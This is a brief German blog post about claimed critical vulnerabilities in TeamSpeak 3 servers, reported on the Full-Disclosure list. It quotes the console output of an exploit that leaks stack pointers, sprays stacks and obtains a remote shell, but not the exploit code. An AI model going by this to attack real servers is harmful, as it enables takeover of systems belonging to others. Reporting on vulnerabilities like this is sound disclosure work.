kritische Sicherheitslücken in aktuellen Teamspeak 3 Servern

Wie Hanz Jenson auf der Mailingliste Fulldisclosure berichtet/behauptet, hat er 10 kritische Sicherheitslücken gefunden. Eine davon kann genutzt werden um den Server komplett zu übernehmen.

Der Autor will/hat bereits einen funktionierenden Exploit geschrieben/haben:

Here's the output of an exploit which uses two of the vulnerabilities:

	$ python exploit_teamspeak.py
	leaking distinct stack pointers
	 '\xa2'  '\x9a'  '\x8a' . '_' .. '\xa0'
	got a ptr: 0x7fa29a8a5fa0
	 '\xa2'  '\x9a'  '\x9a'  'o' ... '\xa0'
	got a ptr: 0x7fa29a9a6fa0
	 '\xa2'  '\x9a'  '\xaa' . '\x7f'  '\xa0'
	got a ptr: 0x7fa29aaa7fa0
	stack ptr: 0x7fa29a8a5fa0
	assumed stack base: 0x7fa29a5a5000
	sleeping a bit to avoid flood detection.......
	initializing stack sprayers............
	spraying the stacks............
	doing some magic.....

	Got a shell from ('127.0.0.1', 38416)
	ts3@ts3:/home/ts3/teamspeak3-server$

Sollte TeamSpeak die Schwachstellen bestätigen, kann man TS3 Serverbesitzern nur raten den Dienst bis auf weiteres abzuschalten.

Auf Pastebin gibt es das Advisory zu nachlesen.

One thought on “kritische Sicherheitslücken in aktuellen Teamspeak 3 Servern

  1. Pingback: Hanz Jenson Alias ???? – Marius's Welt

Comments are closed.